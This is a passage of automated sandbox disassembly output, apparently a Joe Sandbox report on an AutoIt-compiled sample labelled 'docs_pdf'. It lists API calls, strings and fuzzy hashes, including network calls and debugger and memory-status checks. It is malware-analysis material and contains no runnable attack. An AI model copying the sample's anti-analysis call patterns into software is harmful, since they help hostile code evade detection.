                                                             • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: ContainedObject
                                                            • String ID: AutoIt3GUI$Container
                                                            • API String ID: 3565006973-3941886329
                                                            • Opcode ID: 14496e95dc1ea360f7dd752e2d3c9545a6404e31227f624eaf1b50098ca1ec63
                                                            • Instruction ID: 52d3e42347d0e29aedc38d4c808170b4eec57d83e7ed7d081d7a4eee1978fc79
                                                            • Opcode Fuzzy Hash: 14496e95dc1ea360f7dd752e2d3c9545a6404e31227f624eaf1b50098ca1ec63
                                                            • Instruction Fuzzy Hash: 16915C746042019FDB24DF68C885A66B7F9FF49710F24856DF949CB6A1DB70E841CB50
                                                            APIs
                                                              • Part of subcall function 0010FEC6: _wcscpy.LIBCMT ref: 0010FEE9
                                                              • Part of subcall function 000F9997: __itow.LIBCMT ref: 000F99C2
                                                              • Part of subcall function 000F9997: __swprintf.LIBCMT ref: 000F9A0C
                                                            • __wcsnicmp.LIBCMT ref: 0015B298
                                                            • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0015B361
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                             • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                            • String ID: LPT
                                                            • API String ID: 3222508074-1350329615
                                                            • Opcode ID: 05a70e5a771f26039154a51db7e226f7abff11d975143e6de76d4ce839406e87
                                                            • Instruction ID: 6a98e520bc5b61f5caef9372835f07ec989e18121327c042d2aa56b6e72c8df2
                                                            • Opcode Fuzzy Hash: 05a70e5a771f26039154a51db7e226f7abff11d975143e6de76d4ce839406e87
                                                            • Instruction Fuzzy Hash: 09617275A04219EFCB18DF98C885EFEB7B4BF08311F114069F956AB291DB70AE44CB90
                                                            APIs
                                                            • Sleep.KERNEL32(00000000), ref: 00102AC8
                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 00102AE1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                             • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: GlobalMemorySleepStatus
                                                            • String ID: @
                                                            • API String ID: 2783356886-2766056989
                                                            • Opcode ID: 6bb0dfba47599dafaef129d2c1b4c4f07749458c360c1cba8cb35e093b3f29b8
                                                            • Instruction ID: c765726d394248d933095a48b48e8c6fd72fe4f3600c537e539fdffcf0096221
                                                            • Opcode Fuzzy Hash: 6bb0dfba47599dafaef129d2c1b4c4f07749458c360c1cba8cb35e093b3f29b8
                                                            • Instruction Fuzzy Hash: 365146714187489BD320AF14D886BABBBF8FF84310F82885DF2D9511A2DB318569CB66
                                                            APIs
                                                              • Part of subcall function 000F506B: __fread_nolock.LIBCMT ref: 000F5089
                                                            • _wcscmp.LIBCMT ref: 00159AAE
                                                            • _wcscmp.LIBCMT ref: 00159AC1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                             • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: _wcscmp$__fread_nolock
                                                            • String ID: FILE
                                                            • API String ID: 4029003684-3121273764
                                                            • Opcode ID: 9581492b6cc434bbe39c67b508a7919eed1867e9cc8c3510a5aacfdda6348e99
                                                            • Instruction ID: 1b9e638e61363b1431fd9266cd782ea5a5bca8b4547f622f93593ff18d8cba2a
                                                            • Opcode Fuzzy Hash: 9581492b6cc434bbe39c67b508a7919eed1867e9cc8c3510a5aacfdda6348e99
                                                            • Instruction Fuzzy Hash: BE41D771A00619FADF209EA4DC45FEFB7BDEF45711F000079FA10AB182DB759A0497A1
                                                            APIs
                                                            • _memset.LIBCMT ref: 00162892
                                                            • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 001628C8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                             • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: CrackInternet_memset
                                                            • String ID: |
                                                            • API String ID: 1413715105-2343686810
                                                            • Opcode ID: 66f0f032e951c0133ec569b4018ca68b2c4bb81a9c7745bfae17c11c3779aebf
                                                            • Instruction ID: 0c6e01fcc6b464a6b4e2202aa8c07e4f03fc3f03acffed6984037b6d885e5e58
                                                            • Opcode Fuzzy Hash: 66f0f032e951c0133ec569b4018ca68b2c4bb81a9c7745bfae17c11c3779aebf
                                                            • Instruction Fuzzy Hash: 5F313A71800119AFDF05EFA1CC85EEEBFB9FF08340F10402AF919A6166DB355A56DBA1
                                                            APIs
                                                            • DestroyWindow.USER32(?,?,?,?), ref: 00176D86
                                                            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00176DC2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                             • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Window$DestroyMove
                                                            • String ID: static
                                                            • API String ID: 2139405536-2160076837
                                                            • Opcode ID: 5c38811a9abd5d9c5364feafa0b68097b88bcd793ef0877978f355ce95aa41ee
                                                            • Instruction ID: 7887609ed569f79ffbe9eb44214a13a50f92324dd43ccfcd64c7f4a6d5e0823d
                                                            • Opcode Fuzzy Hash: 5c38811a9abd5d9c5364feafa0b68097b88bcd793ef0877978f355ce95aa41ee
                                                            • Instruction Fuzzy Hash: 02317C71210608AEDB209F68CC80BFB77B9FF48724F108619F9A997190DB31AC91DB60
                                                            APIs
                                                            • _memset.LIBCMT ref: 00152E00
                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00152E3B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                             • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: InfoItemMenu_memset
                                                            • String ID: 0
                                                            • API String ID: 2223754486-4108050209
                                                            • Opcode ID: 82b1129352f45fff4c3dd82dccaa3332961e8cc9bfc473e6e024c705044510c8
                                                            • Instruction ID: 43162628f2c50b15f726114a420ee089f9137f524b2c20dfcd0d74734d2eb3db
                                                            • Opcode Fuzzy Hash: 82b1129352f45fff4c3dd82dccaa3332961e8cc9bfc473e6e024c705044510c8
                                                            • Instruction Fuzzy Hash: EF31D733A00305EBEB288F58D8867DEBBB9EF06351F140469EDA59A1A0D7709D89CB50
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 001769D0
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 001769DB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                             • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: Combobox
                                                            • API String ID: 3850602802-2096851135
                                                            • Opcode ID: 8c19628f1cdb95f683c7803ae5e035452a91f17f11b36a197d0aad0d304af830
                                                            • Instruction ID: 80e41902b0373ce9cc0d4858a8443716273227bd14e82206eeb8e135485bd130
                                                            • Opcode Fuzzy Hash: 8c19628f1cdb95f683c7803ae5e035452a91f17f11b36a197d0aad0d304af830
                                                            • Instruction Fuzzy Hash: A811C471700609AFEF119F14CC90EFB377AEB993A8F118124FA5C97291D7759C9187A0
                                                            APIs
                                                              • Part of subcall function 000F1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 000F1D73
                                                              • Part of subcall function 000F1D35: GetStockObject.GDI32(00000011), ref: 000F1D87
                                                              • Part of subcall function 000F1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 000F1D91
                                                            • GetWindowRect.USER32(00000000,?), ref: 00176EE0
                                                            • GetSysColor.USER32(00000012), ref: 00176EFA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                             • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                            • String ID: static
                                                            • API String ID: 1983116058-2160076837
                                                            • Opcode ID: a425c06879a737308b675ba02efa151c6d1666da6d8061128646bc0b1dbe71f3
                                                            • Instruction ID: 2335e6cc4feb8b24d98760adea1598464a1c3323c32b43c374e7475f176e3ed4
                                                            • Opcode Fuzzy Hash: a425c06879a737308b675ba02efa151c6d1666da6d8061128646bc0b1dbe71f3
                                                            • Instruction Fuzzy Hash: 81213D72514609AFDB04DFA8DD45AFA7BB8FB08314F044629FD59E3250D734E851DB60
                                                            APIs
                                                            • GetWindowTextLengthW.USER32(00000000), ref: 00176C11
                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00176C20
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                             • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: LengthMessageSendTextWindow
                                                            • String ID: edit
                                                            • API String ID: 2978978980-2167791130
                                                            • Opcode ID: 1e8c8839cc6bd0f69d681637b58a16f66603821228ae67c16d2ce7ab4603174b
                                                            • Instruction ID: 2b01d0ee6f4be950b0ac3877b4012fd9609ce0dcbf7db91a1b0220994c52386e
                                                            • Opcode Fuzzy Hash: 1e8c8839cc6bd0f69d681637b58a16f66603821228ae67c16d2ce7ab4603174b
                                                            • Instruction Fuzzy Hash: 09118C71600608ABEB118E64DC41AFB3779EB15378F608728F969D71E0C775DC919B60
                                                            APIs
                                                            • _memset.LIBCMT ref: 00152F11
                                                            • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00152F30
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                             • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: InfoItemMenu_memset
                                                            • String ID: 0
                                                            • API String ID: 2223754486-4108050209
                                                            • Opcode ID: 68e019cf5bfbe79f6d2d6672990d62335f8d5e2ad6f3715cd3db94ee73b898f5
                                                            • Instruction ID: b023e5c11b42b9edd9454251bded2bcf7f6ae59436f93855bc42365f81d6d5a1
                                                            • Opcode Fuzzy Hash: 68e019cf5bfbe79f6d2d6672990d62335f8d5e2ad6f3715cd3db94ee73b898f5
                                                            • Instruction Fuzzy Hash: C911B233901214EBDB24DB58EC45B9D77B9EB17311F1501B6EC64AB2A0D7B0AD48C7D1
                                                            APIs
                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00162520
                                                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00162549
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                             • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Internet$OpenOption
                                                            • String ID: <local>
                                                            • API String ID: 942729171-4266983199
                                                            • Opcode ID: 958fec56a52c705aaa79b3a1a2b7e7a1817ab05adf46e54092b94e8031f1f945
                                                            • Instruction ID: b493ff21a3a0d4ad87312187a8945a3a5496acbd94bfed1af5f945e3aec58590
                                                            • Opcode Fuzzy Hash: 958fec56a52c705aaa79b3a1a2b7e7a1817ab05adf46e54092b94e8031f1f945
                                                            • Instruction Fuzzy Hash: 8911C270541A25BEDB388F518C99EFBFF68FF06751F10812AF94656040D77069A1DAF0
                                                            APIs
                                                              • Part of subcall function 0016830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,001680C8,?,00000000,?,?), ref: 00168322
                                                            • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 001680CB
                                                            • htons.WSOCK32(00000000,?,00000000), ref: 00168108
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                             • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWidehtonsinet_addr
                                                            • String ID: 255.255.255.255
                                                            • API String ID: 2496851823-2422070025
                                                            • Opcode ID: 4db01e6857552e2bab8d4ebe89aded49d44b46a155c1055755f2e0f7d92f9afc
                                                            • Instruction ID: 786dc8cfeba7ba28252588565b95879ebe60b472854a2d96f03a8c03f7d4b9a9
                                                            • Opcode Fuzzy Hash: 4db01e6857552e2bab8d4ebe89aded49d44b46a155c1055755f2e0f7d92f9afc
                                                            • Instruction Fuzzy Hash: 13110834100209ABCB24AF64CC46FFEB334FF15310F10861AFA1597292DB31A865C791
                                                            APIs
                                                              • Part of subcall function 000F7F41: _memmove.LIBCMT ref: 000F7F82
                                                              • Part of subcall function 0014B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0014B0E7
                                                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00149355
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                             • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 372448540-1403004172
                                                            • Opcode ID: b231ff597163a8c1a832031775daec03d291d928f21dba3bd873b0e2195c6297
                                                            • Instruction ID: c6956f22654bea09d3fad84014c8f1d87bfb6c7b8fc977321ba8d4db00479f92
                                                            • Opcode Fuzzy Hash: b231ff597163a8c1a832031775daec03d291d928f21dba3bd873b0e2195c6297
                                                            • Instruction Fuzzy Hash: 5401F171A45218ABCB08EFB4CC928FF7379BF06320B140619FA32572E2DB31580C9651
                                                            APIs
                                                              • Part of subcall function 000F7F41: _memmove.LIBCMT ref: 000F7F82
                                                              • Part of subcall function 0014B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0014B0E7
                                                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 0014924D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 372448540-1403004172
                                                            • Opcode ID: 7b5686412b16554981888613bf90b96feec0b77d551d2bea8d87922ec71ed460
                                                            • Instruction ID: 09aa17eea18b3e1a71ae3af869a681fcd29cd2d9eb57026241f143ab5a1dd0ba
                                                            • Opcode Fuzzy Hash: 7b5686412b16554981888613bf90b96feec0b77d551d2bea8d87922ec71ed460
                                                            • Instruction Fuzzy Hash: 9E01A775E452087BCB08EBA4C992DFF73BC9F55300F140029BA1667692EB515F1C96B2
                                                            APIs
                                                              • Part of subcall function 000F7F41: _memmove.LIBCMT ref: 000F7F82
                                                              • Part of subcall function 0014B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0014B0E7
                                                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 001492D0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 372448540-1403004172
                                                            • Opcode ID: 01a2b1abf76ee9f3a16fd1a1d0d02e85d8474fde99496ae9dc4e85717c02d49a
                                                            • Instruction ID: 5415ce20982ce2cca84e9e1e57fe964e1d6cb6d2a93ed38aeb25aa21372e44e0
                                                            • Opcode Fuzzy Hash: 01a2b1abf76ee9f3a16fd1a1d0d02e85d8474fde99496ae9dc4e85717c02d49a
                                                            • Instruction Fuzzy Hash: 3501D6B1E8520877CB08EBA4C982EFF77BC9F11301F240125BA1663692DB619F0C9272
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: ClassName_wcscmp
                                                            • String ID: #32770
                                                            • API String ID: 2292705959-463685578
                                                            • Opcode ID: 3429165dbf4534788204347d90306878176afd60cad6642f8c935d63678a45c7
                                                            • Instruction ID: 46549a77036c0272918de527d3a900692533314b37c0fef4988c01b769f129e8
                                                            • Opcode Fuzzy Hash: 3429165dbf4534788204347d90306878176afd60cad6642f8c935d63678a45c7
                                                            • Instruction Fuzzy Hash: 1EE0613250022D57D7209695EC05FA7F7ACEF41731F00016BFD14D3050D760998587D0
                                                            APIs
                                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 001481CA
                                                              • Part of subcall function 00113598: _doexit.LIBCMT ref: 001135A2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Message_doexit
                                                            • String ID: AutoIt$Error allocating memory.
                                                            • API String ID: 1993061046-4017498283
                                                            • Opcode ID: 5e09e51eb5d5aa9c2c0f18e936437355677e77aa4ec35ded5690ef5446bf5dbc
                                                            • Instruction ID: 80d5666552d150cd47d820a57a95be7f60b6e6044626f9d8bb37c4a465c52526
                                                            • Opcode Fuzzy Hash: 5e09e51eb5d5aa9c2c0f18e936437355677e77aa4ec35ded5690ef5446bf5dbc
                                                            • Instruction Fuzzy Hash: 27D05B323C531C36D21432A86D0BFCB79484B19F51F104426BB08555D38FD155C243D9
                                                            APIs
                                                              • Part of subcall function 0012B564: _memset.LIBCMT ref: 0012B571
                                                              • Part of subcall function 00110B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0012B540,?,?,?,000F100A), ref: 00110B89
                                                            • IsDebuggerPresent.KERNEL32(?,?,?,000F100A), ref: 0012B544
                                                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,000F100A), ref: 0012B553
                                                            Strings
                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0012B54E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
